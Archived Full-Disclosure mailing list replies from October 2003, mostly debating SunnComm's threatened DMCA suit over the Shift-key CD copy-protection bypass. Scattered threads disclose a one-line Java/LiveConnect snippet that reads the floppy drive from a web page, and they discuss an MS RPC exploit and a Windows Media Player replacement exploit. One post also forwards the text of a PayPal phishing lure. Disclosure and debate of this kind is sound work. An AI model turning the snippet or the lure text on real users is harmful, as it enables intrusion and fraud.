Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Nick Jacobsen wrote: it seems to me the perfect chance for a countersuite... cause at least as far as I know, most state's definition of computer crime would include installing software on a machine withough the owners permission. or knowlege.. and since that is what SunnComm's protection is doing... According to the report, the software shows an EULA before the system is modified, so there is user consent. By the way, the subject line is misleading. SunnComm doesn't sue because of the shift key description (the company isn't *that* stupid), but because of the removal instructions for the Trojan Horse. These instructions could be indeed illegal to publish in the United States and other countries because they are specifically designed to circumvent an effective measure for restricting copies. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
It's funny as how companys are running crazy. Throwing lawsuit at anyone that proves that they are complete idiots! They might as well sue a whole group of companies for not implementing the autorun feature that automatically installs their protection driver to prevent anyone from copying the software. (which can easily be disabled in less than 5 minutes) Hopefully, we won't get sued for knowing how to bypass the protection scheme... (You can read the paper in question at : http://www.cs.princeton.edu/~jhalderm/cd3/) Salutations, Johan Denoyer [EMAIL PROTECTED] Digital Connexion http://www.digital-connexion.info Richard M. Smith a dit#160;: http://news.com.com/2100-1025_3-5089168.html?tag=nefd_top Student faces suit over key to CD locks Last modified: October 9, 2003, 2:01 PM PDT By John Borland Staff Writer, CNET News.com SunnComm Technologies, a developer of CD antipiracy technology, said Thursday that it will likely sue a Princeton student who early this week showed how to evade the company's copy protection by pushing a computer's Shift key. Princeton Ph.D. student John Alex Halderman published a paper on his Web site on Monday that gave detailed instructions on how to disarm the SunnComm technology, which aims to block unauthorized CD copying and MP3 ripping. The technology is included on an album by Anthony Hamilton that was recently distributed by BMG Music. On Thursday, SunnComm CEO Peter Jacobs said the company plans legal action and is considering both criminal and civil suits. He said it may charge the student with maligning the company's reputation and, possibly, with violating copyright law that bans the distribution of tools for breaking through digital piracy safeguards. We feel we were the victim of an unannounced agenda and that the company has been wronged, Jacobs said. I think the agenda is: 'Digital property should belong to everyone on the Internet.' I'm not sure that works in the marketplace. The cases are already being examined by some intellectual-property lawyers for their potential to test the extremes of a controversial copyright law that block the distribution of information or software that breaks or circumvents copy-protection technologies. Several civil and criminal cases based on the Digital Millennium Copyright Act have been filed against people who distributed information or software aimed at breaking through antipiracy locks. In one, Web publisher Eric Corley was banned by a federal judge from publishing software code that helped in the process of copying DVDs. In a criminal case, Russian company ElcomSoft was cleared of charges that it had distributed software that willfully broke through Adobe Systems' e-book copy protection. Both of those cases dealt with software or software code, however. The issue in Halderman's case is somewhat different. In his paper, published on the Princeton Web site on Monday, the student explained that the SunnComm technique relies on installing antipiracy software directly from the protected CD itself. However, this can be prevented by stopping Microsoft Windows' auto-run feature. That can be done simply by pushing the Shift key as the CD loads. If the CD does load and installs the software, Halderman identified the driver file that can be disabled using standard Windows tools. Free-speech activists said the nature of Halderman's instructions--which appeared in an academic paper, used only functions built into every Windows computer, and were not distributed for profit--meant they would not fall under DMCA scrutiny. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Do you really think CDs will be protected in future?
Phillip R. Paradis wrote: I agree that they do have a case. I think, however, their problems are entirely of their own creation. Yes. 2.) Offer added value. Good artists and managers have known this for a long time. People will more likely buy a record which also has nice artwork, exclusive content (maybe printed) or gives access to online content or such. True enough, though such things will get copied also. New Line Cinemas did something interesting with it's Lord of the Rings movies; they released an extended version of the movie (on 5 DVDs) that also included (among other extras) a pair of miniature statues from the movie. This edition is a bit expensive, but copying it entirely is rather difficult. (If anyone disputes this, would they please email me a 5lb stone statue...) That's the kind of thing I had in mind. Some artists do and have done it well. Others have failed. Also do not forget that most copiers are not making a copy for you sepcifically, rather they make some good enough rips, but won't bother with niceties. That's the stuff you can then d/l from P2P networks. Often the rips weren't even proof-listened, since they contained cracks and other distortions :-) 3.) Offer digital downloads and on-demand CD generation. Quite often, I may want my personal Best of which is not the same as theirs. Or I may want individual tracks. The price should be reasonable, of course. The price should be free, if you can show that you have purchased CDs which already contain those tracks. US Copyright law provides for fair use; making copies of a work for your own use certainly qualifies as fair use. Why then, should I be forced to pay an additional fee for a right I am supposedly given by law? Yes. But I had in mind that these opportunities should also exist if I do not yet have that music. Eg I see a Best of by one of my favourite artists, but not all songs that I like are there. Then I should have the option of creating a personal Best of CD, which then can be delivered to me in physical format or made available as a download per track. If prices were reasonable for this, sales would go up I think. Agreed, for the most part. As I work for a retailer, however, I know that what consumers think is irrelevant to the record folks. The retailer I work for has an agreement with it's suppliers such that once a customer opens a CD (or DVD, VHS tape, software package, etc) they cannot return it, unless the media is defective, in which case they get another copy of the same product only. So if your newly purchased CD is copy protected and won't play in your CD player, you're stuck with it anyway, unless you want to get another copy of the same useless disc. As others have pointed out, this is not so simple. If there is no labeling, the goods could be deemed as defective. In fact, they already have been in several cases in Europe. Since consumer-protection legislation is quite strong here, that would only leave the retailer hanging, but not the customer. Of course, if the disc does not claim to be an audio CD (no Compact Disc logo) and has clear and understandable language on the outside to tell you what's up (I have seen some attempts at this already) in the customer's native tongue (not only in English), than the defective argument does no longer hold probably. I still think that copy-protection is bad for business reasons, though, and this is why it should be dropped. IMHO it hurts sales. Eg I for sure haven't bought a single copy-protected title yet and will continue to do so, although this meant that some of my favourites remained on the shelf. And since we all know that it doesn't really stop copying either, it is fairly pointless, at least imho. (not even digital copying, although this was not mentioned here, there are quite a few drives that actually have firmware driver to circumvent and I am yet to see armed police to burst into the local Media Markt to confiscate eg all recent Plextor CD-RW drives as circumvention tech...) Enough of me (although I really think about publishing a Best of FD CD with some cute posts on it and make it a smash hit, without copy protection, but *with* nice hardcopy pix of some of the participants. It could also include remixes of some posts :-P ) Sz. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] a stupid bug ...that works on mozilla, opera, IE
bipin gautam wrote: I have successfully, tried this in latest version of opera and IE 6 and MOZILLA. What do you say??? Does not work with Mozilla 1.4 under WinXP (patched up-to-date). Jan Wildeboer ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Appel even worse then linux. because of it's print-to-pdf out of any application your able to change the permission on any PDF (including copy-permission ;-) cheerio -- Jeremiah Cornelius wrote: Apple and Linux are 'circumvention devices'! *Disclaimer* This message is for the addressee only and may contain confidential or privileged information. You must delete and not use it if you are not the intended recipient. It may not be secure or error-free. All e-mail communications to and from the Julius Baer Group may be monitored. Processing of incoming e-mails cannot be guaranteed. Any views expressed in this message are those of the individual sender. This message is for information purposes only. All liability of the Julius Baer Group and its entities for any damages resulting from e-mail use is excluded. US persons are kindly requested to read the important legal information presented after clicking here: http://www.juliusbaer.com/maildisclaimer ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Okay... So according to the law it's illegal to remove the program if later you decide to not agree to the EULA? (Which I'm sure it says that the terms can be changed at any time within it) That sure doesn't seem kosher to me... I feel that you should be able to remove/disable whatever on your computer. According to this logic... Using Ad-Aware is illegal because it removes spyware from your system without their non-existent uninstall interface! Oh, and you're also not allowed to know what the file/driver name of the program that they've installed is either? Nice! -Original Message- From: [EMAIL PROTECTED] [mailto:full-disclosure- [EMAIL PROTECTED] On Behalf Of Florian Weimer Sent: Thursday, October 09, 2003 23:52 To: Nick Jacobsen Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m Nick Jacobsen wrote: it seems to me the perfect chance for a countersuite... cause at least as far as I know, most state's definition of computer crime would include installing software on a machine withough the owners permission. or knowlege.. and since that is what SunnComm's protection is doing... According to the report, the software shows an EULA before the system is modified, so there is user consent. By the way, the subject line is misleading. SunnComm doesn't sue because of the shift key description (the company isn't *that* stupid), but because of the removal instructions for the Trojan Horse. These instructions could be indeed illegal to publish in the United States and other countries because they are specifically designed to circumvent an effective measure for restricting copies. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MS RPC remote exploit.
From my cursory look at the code,(/me is a C rookie) it seems that it only affects w2k and winXP, does anyone know of any exploit that targets NT4??? Given that question, how hard would it be to code in NT4 functionality?? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse Sent: 09 October 2003 14:27 To: 'Sudharsha Wijesinghe'; [EMAIL PROTECTED] Subject: SV: [Full-Disclosure] MS RPC remote exploit. Hi, Systems already updated are not vulnerable to this exploit. The new code is simply improved and is now more universal. It doesn´t make use of static addresses for jumps which makes the improved code much more dangerous since it will be effective on a large range of different vulnerable Microsoft Windows operativ systems. Kind regards // Med venlig hilsen Peter Kruse CSIS / Kruse Security ApS http://www.krusesecurity.dk - www.csis.dk -Oprindelig meddelelse- Fra: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] På vegne af Sudharsha Wijesinghe Sendt: 9. oktober 2003 14:42 Til: [EMAIL PROTECTED] Emne: [Full-Disclosure] MS RPC remote exploit. According to MS there cant be any Remote exploit on MS RPC except for a DOS attack using 139/135/445. How ever the code is available for a shell code. has any one tried this exploit? Sudharsha ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ---Warning This e-mail is from outside Tesco - check that it is genuine. Tesco may monitor and record all e-mails. Disclaimer This is a confidential email. Tesco may monitor and record all emails. The views expressed in this email are those of the sender and not Tesco. Tesco Stores Limited, Tesco House, Delamare Road, Cheshunt, Herts, EN8 9SL: company number 519500. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
On Thu, 2003-10-09 at 23:54, Richard M. Smith wrote: http://news.com.com/2100-1025_3-5089168.html?tag=nefd_top Student faces suit over key to CD locks [snip] In his paper, published on the Princeton Web site on Monday, the student explained that the SunnComm technique relies on installing antipiracy software directly from the protected CD itself. However, this can be prevented by stopping Microsoft Windows' auto-run feature. That can be done simply by pushing the Shift key as the CD loads. Do not news.com.com, theregister.co.uk, full-disclosure, Richard M. Smith, me and everyone simply by citing these articles violate the DMCA? Actually, I don't have to read the student's paper anymore to learn how to circumvent SunnComm's audio CD protection - reading some news report about the issue suffices. So, everybody telling others how this protection can be circumvented could theoretically be sued under US law. Europe seemed to be safe against these perversions, but Germany has recently adopted a DMCA-like law. In fact, every member of the EU will have to adopt the European Union Copyright Directive [1]. However, these things were not invented in Brussel, it is solely the adoption of the WIPO Copyright Treaty from December 1996 [2,3]. regards nicola [1] http://wiki.ael.be/index.php/EUCD-Status [2] http://www.eurorights.org/eudmca/index.html [3] http://www.wipo.int/treaties/ip/wct/index.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Florian Weimer wrote: By the way, the subject line is misleading. SunnComm doesn't sue because of the shift key description (the company isn't *that* stupid), but because of the removal instructions for the Trojan Horse. These instructions could be indeed illegal to publish in the United States and other countries because they are specifically designed to circumvent an effective measure for restricting copies. as would use of a recovery disk set (supplied with most pcs) as it would almost as a side effect remove any trojans :) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
In his paper, published on the Princeton Web site on Monday, the student explained that the SunnComm technique relies on installing antipiracy software directly from the protected CD itself. However, this can be prevented by stopping Microsoft Windows' auto-run feature. That can be done simply by pushing the Shift key as the CD loads. Do not news.com.com, theregister.co.uk, full-disclosure, Richard M. Smith, me and everyone simply by citing these articles violate the DMCA? Actually, I don't have to read the student's paper anymore to learn how to circumvent SunnComm's audio CD protection - reading some news report about the issue suffices. lmfao, perfectly stated, and neither do a another billion people who will read, or heaven forbid hear it on the radio or see it on tv.. the information is now in the public domain... being exactly told the method of circumvention in the media / news description and subsequent article.. http://www.cnn.com/2003/TECH/ptech/10/08/bmg.protection.reut/ http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=suncomm+shift+keybtnG=Google+Search LOL rofl HAAHHAHAHa Donnie Werner E2 Labs http://e2-labs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Opera/Netscape/Mozilla: Floppy access from untrusted java applet
Hi, just put the floppy reading java call in an applet for those who think the problem has nothing to do with java. The problem is that the sandbox should protect the system from untrusted access to system ressources, such as a floppy drive. But again like many things in the jdk (see illegalaccess.org for details) this does not work like printed in the java specification. You can try the new floppy applet at: http://www.illegalaccess.org/exploits/java/applet/MyFloppySucks.html Tested on: - IE 6 - Opera 7.2 - Netscape on Win32... Warning: The applet may start an alert message to enter a floppy disk, if this [your own!] disk is infected by a virus, it may damage your PeeCee. But the applet itself is plain java, no disk virus included ! Marc -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer -- Forwarded message -- Date: Wed, 8 Oct 2003 00:08:33 +0200 (MES) From: Marc Schoenefeld [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Opera/Netscape/Mozilla: Floppy access from liveconnect html page (fwd) Hi, just tried the following html page in opera 72/netscape 72/mozilla on windows and I was prompted with an insert floppy prompt box. The page was uploaded to a remote site and loaded from there. (script) a=Packages.org.apache.crimson.tree.XmlDocument.createXmlDocument(file:///a:/); (/script) Can anybody try this please to verify the issue ? Instead of a: you could also please try com1/lpt1/prn/aux/clock$. My used java version is jdk 1.4.2_01 browser plugin. Thanks Marc -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer [ PGP Signature ok - Wed Oct 8 00:07:59 MES 2003 ] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] !A stupid bug ...that works on mozilla, opera, IE!
Hi! On Thu, Oct 09, 2003 at 06:04:00PM -0500, Wayne Schroeder wrote: I don't know sport... I think you need to double check your 's and look again. Javascript console is just bitching on my mozilla saying that the alert function isn't finished with a ) correctly. Also note that using the sequence / within a script block will be treated as end-of-script. Quoting from http://www.w3.org/TR/html4/types.html#type-cdata: -- snip -- Although the STYLE and SCRIPT elements use CDATA for their data model, for these elements, CDATA must be handled differently by user agents. Markup and entities must be treated as raw text and passed to the application as is. The first occurrence of the character sequence / (end-tag open delimiter) is treated as terminating the end of the element's content. In valid documents, this would be the end tag for the element. -- snap -- Thus, even with correct quotes, the JavaScript code will be considered finished at the first /script, even though it's within quotes (the browser must not interpret the script code when looking for the end tag). The remaining )/script is then displayed as ) in the browser window. Note that it gets displayed in the document, not in an alert box (which the original post was suggesting). Furthermore, you'll get a JavaScript error, as the actual script code seen by the engine is alert(scriptlocation.href=http://www.ysgnet.com; which is invalid - so no alert box at all. Ciao Thomas ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Strange from address
Hi James, If you insert the following string into the mail from: field [EMAIL PROTECTED] it appears to by pass the mx check and replys ok. if you read the qmail manpages (addresses(5) specifically), you can see that this a qmail extension: this is the envelope sender of a double bounce. What I fail to see however, is that how it can be a security problem. It is not very difficult to generate envelope senders that pass your mx check anyway. Regards, Akos -- Akos Szalkai [EMAIL PROTECTED] IT Consultant, CISA 2F 2000 Szamitastechnikai es Szolgaltato Kft. Tel: (+36-1)-4887700 Fax: (+36-1)-4887709 WWW: http://www.2f.hu/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Increased TCP 139 Activity
Ron Dufresne wrote: If this is indeed the case, the ping sweep will all be packets of 92 byte, these are windows packets, and the recent rcpdcom sploits are the culprit. ICMP packets 92-bytes in size (72 bytes + 20 bytes for header) are usually due to a welchia infected host trying to propagate. It is not a rpcdcom exploit. V/r, Sung J. Choe PACAF CSS/SCHP, PACAF NOSC Information Assurance Analyst DSN: 315-449-4317, Comm: 808-449-4317 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Do you really think CDs will be protected in future?
Alan said: The whole question really comes down to this: warranty of merchantability definition - a warranty of merchantability simply guarantees that goods sold are fit for the ordinary purpose for which the goods were sold... This is a general rule of fairness that what looks like a carton of milk in the supermarket dairy case really is drinkable milk and not sour or unusable. Damn it. There goes my business plan of selling Golden Poison Frogs in a container indistinguishable from a bag of Oreos. I think the real problem lies with the concept of hand-me-down Acceptable Use Policies / Licence Agreements -- that a party completely removed from a retail environment might be able to dictate conditions of a sale (and in some cases, resale!) Although I'll readily admit that some restrictions may be reasonable, they shouldn't be entirely up to the supplier/manufacturer. C ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Okay... So according to the law it's illegal to remove the program if later you decide to not agree to the EULA? (Which I'm sure it says that the terms can be changed at any time within it) That sure doesn't seem kosher to me... I feel that you should be able to remove/disable whatever on your computer. According to this logic... Using Ad-Aware is illegal because it removes spyware from your system without their non-existent uninstall interface! Oh, and you're also not allowed to know what the file/driver name of the program that they've installed is either? Nice! Hi Poof, Odds are the copy-protection-related drivers can be removed via Windows' Add/Remove Programs control panel applet -- rendering your 'protected' media a defacto coaster until you accept the EULA a second time. C ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Did any one sue Sharpie when it was found that a black magic marker would defeat Sony copy protection? - Original Message - From: Adam Dyga [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 6:09 PM Subject: Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m Dnia pi 10. padziernika 2003 00:08, Jeremiah Cornelius napisa: | Ahhh... The wildest, satirical speculations on FullDisclosure come to | fruition in a court of law. Let the games begin! | | http://www.theregister.co.uk/content/6/33322.html | SunnComm to sue 'Shift key' student for $10m | By Tony Smith | Posted: 09/10/2003 at 20:47 GMT | | | SunnComm has threatened Princeton PhD student Alex Halderman with the | Digital Millennium Copyright Act (DMCA) for exposing a key weakness in the | company's latest CD copy protection technology, MediaMax CD3. | How stupid they are, didn't they think of other than Windows operating systems that don't have something like Autorun feature? -- Greets adeon ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Student faces suit over key to CD locks
snip On Thursday, SunnComm CEO Peter Jacobs said the company plans legal action and is considering both criminal and civil suits. He said it may charge the student with maligning the company's reputation and, possibly, with violating copyright law that bans the distribution of tools for breaking through digital piracy safeguards. snip Correct me if I'm wrong but how is holding down the shift key distributing tools for breaking through digital piracy safeguards? Shouldn't the keyboard manufacturers be sued since they are the ones that made the shift key and distributed it? Jonathan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Internet Explorer (BAN IT !!!)
Yup that's true the exploit actually didnt worked even if I was logged in as Administrator or a normal user in Windows XPSp1 with all patches installed except 811394. Regards, Syed Imran Ali Senior Network Engineer (T) +92-300-9256202 :~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~: The information contained in this e-mail is confidential and may be privileged. It is intended for the addressee only. If you have received this e-mail in error please notify us immediately, then delete this e-mail. You should not copy it for any purpose, or disclose its contents to any other person. We cannot accept any responsibility for viruses, so please scan all attachments. The statements and opinions expressed in this message are those of the author and do not necessarily reflect those of the company. The company does not take any responsibility for the views of the author -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of gregh Sent: Friday, October 10, 2003 3:07 AM To: Irwan Hadi Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) - Original Message - From: Irwan Hadi [EMAIL PROTECTED] To: gregh [EMAIL PROTECTED] Cc: Stephen [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 3:55 PM Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote: - Original Message - From: Stephen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 5:19 AM Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!) It becomes really dangerous to use IE ... http://www.k-otik.com/WMPLAYER-TEST/ God bless Mozilla http://www.mozilla.org/ Your test didn't work on my IESP1 under XP with all patches excepting 811394. Absolutely no effect on WMP. My original WMP remains and works. It depends whether you were logging as a privileged user or not. If not, then your browser can't delete the wmplayer.exe file, because the only user that can change/delete the wmplayer.exe file is privileged user. C:\PROGRA~1\Windows Media Playercacls wmplayer.exe C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R BUILTIN\Power Users:C BUILTIN\Administrators:F NT AUTHORITY\SYSTEM:F C:\PROGRA~1\Windows Media Player The problem is just too many people are running their Windows with Full Privileges. Didnt matter what I logged in as. I normally am ADMIN, naturally but a priveleged user, a very limited user - no difference. The exploit didnt work. Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [Fwd: PayPal Account Security Measures]
great work, looks very real. Alejandro Mery ---BeginMessage--- Title: PayPal Please verify your information today! Dear Paypal Member. Your account has been randomly flagged in our system as a part of our routine security measures. This is a must to ensure that only you have access and use of your paypal account and to ensure a safe Paypal experience. We require all flagged accounts to verify their information on file with us. To verify your information, click here and enter the details requested. After you verify your information, your account shall be returned to good standing and you will continue to have full use of your account. Thank you for using PayPal! Please do not reply to this e-mail. Mail sent to this address cannot be answered. ---End Message---
RE: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
I'm not a legal expert, but IIRC, Brown vs. Rural Telephone Company ruled that it was not a violation of any copyright to publish information that belonged to another company...although the issues are slightly different here, I think the same basis could apply here if SunComm were to suggest that the information published by the student was breaking some type of intellectual property rights or such. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [Fwd: PayPal Account Security Measures]
This has been going around for at least a few months ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft Outlines New Initiatives in Ongoi ng Security Efforts To Help Customers
On Thu, 9 Oct 2003 12:50:37 -0500 Dehner, Benjamin T. [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- What is interesting in this article is what Balmer does NOT say. Specifically: - -- code auditing to prevent security problems - -- Q/A testing of software to detect bugs - -- testing of patches to prevent patch interaction and over-write issues - -- third party security testing This was tru$tworthy computing part 1, and it failed miserably. georgi ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
just looked at it, the authors messed up , so no it shouldn't work, it doesn't work here they didn't get that error.jsp is a java server page (something roughly equivalent to asp and php) that sets the response code to something that triggers the res file to be loaded --jelmer - Original Message - From: Syed Imran Ali [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 12:02 PM Subject: RE: [Full-Disclosure] Internet Explorer (BAN IT !!!) Yup that's true the exploit actually didn't worked even if I was logged in as Administrator or a normal user in Windows XPSp1 with all patches installed except 811394. Regards, Syed Imran Ali Senior Network Engineer (T) +92-300-9256202 :~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~: The information contained in this e-mail is confidential and may be privileged. It is intended for the addressee only. If you have received this e-mail in error please notify us immediately, then delete this e-mail. You should not copy it for any purpose, or disclose its contents to any other person. We cannot accept any responsibility for viruses, so please scan all attachments. The statements and opinions expressed in this message are those of the author and do not necessarily reflect those of the company. The company does not take any responsibility for the views of the author -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of gregh Sent: Friday, October 10, 2003 3:07 AM To: Irwan Hadi Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) - Original Message - From: Irwan Hadi [EMAIL PROTECTED] To: gregh [EMAIL PROTECTED] Cc: Stephen [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 3:55 PM Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote: - Original Message - From: Stephen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 5:19 AM Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!) It becomes really dangerous to use IE ... http://www.k-otik.com/WMPLAYER-TEST/ God bless Mozilla http://www.mozilla.org/ Your test didn't work on my IESP1 under XP with all patches excepting 811394. Absolutely no effect on WMP. My original WMP remains and works. It depends whether you were logging as a privileged user or not. If not, then your browser can't delete the wmplayer.exe file, because the only user that can change/delete the wmplayer.exe file is privileged user. C:\PROGRA~1\Windows Media Playercacls wmplayer.exe C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R BUILTIN\Power Users:C BUILTIN\Administrators:F NT AUTHORITY\SYSTEM:F C:\PROGRA~1\Windows Media Player The problem is just too many people are running their Windows with Full Privileges. Didnt matter what I logged in as. I normally am ADMIN, naturally but a priveleged user, a very limited user - no difference. The exploit didnt work. Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Student faces suit over key to CD locks
Does this mean they're going to attempt to sue Microsoft also, for publishing this feature in their Windows documentation? Or perhaps they'll take the RIAA's approach and sue anyone who uses the SHIFT key. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
jelmer wrote: just looked at it, the authors messed up , so no it shouldn't work, it doesn't work here they didn't get that error.jsp is a java server page (something roughly equivalent to asp and php) that sets the response code to something that triggers the res file to be loaded The exploit worked fine here on an XP Home machine with all patches and the latest version of I.E. I changed the executable that ran to ipconfig.exe so I knew what would be running on my computer. I could see the window open, saw the output of ipconfig.exe flash by, and the wmplayer.exe file was replaced by the contents of ipconfig.exe. If the IE configuration was changed to disallow opening content in the media bar, then the error.jsp page was called which resulted in a 404. I cannot say for certain that ipconfig.exe did not run but I didn't see it and the wmplayer.exe file was unchanged. Similar results were seen logging in as a non administor user account. The I.E. configuration change is shown here: http://www.jmu.edu/computing/security/info/iebug.shtml I am not familiar enough with the exploit mechanisms to determine how effective this is but I suspect not very except against the script kiddies that will cut and paste the posted exploit. -- Gary Flynn Security Engineer - Technical Services James Madison University Please R.U.N.S.A.F.E. http://www.jmu.edu/computing/runsafe ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Student faces suit over key to CD locks
[SNIP] Not only that, but by annoucing they are going to sue, they hype the press up so the general public knows about it as well. As it was, the security community and interested geeks were probably the only ones who would have noticed the issue, but now the whole world knows. Can you imagine Johnny Slowpoke, who knows little to nothing about computers, reading the article and saying, Honey, look at this. Some company made copy protection for CDs that was so lame that all you have to do is hold down the shift key to bypass it. Can you imagine that? How stupid is that? And now they're suing the student who pointed it out. What a bunch of dorks! Naw, most non-techies are going to spend a week trying to locate the 'shift' key, after they finally locate the anykey. This story and suit is going to make its waves in the techie circles, but, will most likely not get alot of real play in the real world. Thanks, Ron DuFresne ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Student faces suit over key to CD locks
Below is a comment from a colleague of mine Personally, I have autorun disabled on my laptop anyway so it'd never get installed, but I wonder if it pops up a dialog to ask you if you want this intrusive device driver installed on your system. It's clearly malicious code, since it limits the capabilities of your PC. I wonder if you could sue them for hacking your computer? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Schmehl, Paul L Sent: 10 October 2003 15:25 Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Student faces suit over key to CD locks -Original Message- From: Johan Denoyer [mailto:[EMAIL PROTECTED] Sent: Friday, October 10, 2003 1:49 AM To: Richard M. Smith Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Student faces suit over key to CD locks It's funny as how companys are running crazy. Throwing lawsuit at anyone that proves that they are complete idiots! Not only that, but by annoucing they are going to sue, they hype the press up so the general public knows about it as well. As it was, the security community and interested geeks were probably the only ones who would have noticed the issue, but now the whole world knows. Can you imagine Johnny Slowpoke, who knows little to nothing about computers, reading the article and saying, Honey, look at this. Some company made copy protection for CDs that was so lame that all you have to do is hold down the shift key to bypass it. Can you imagine that? How stupid is that? And now they're suing the student who pointed 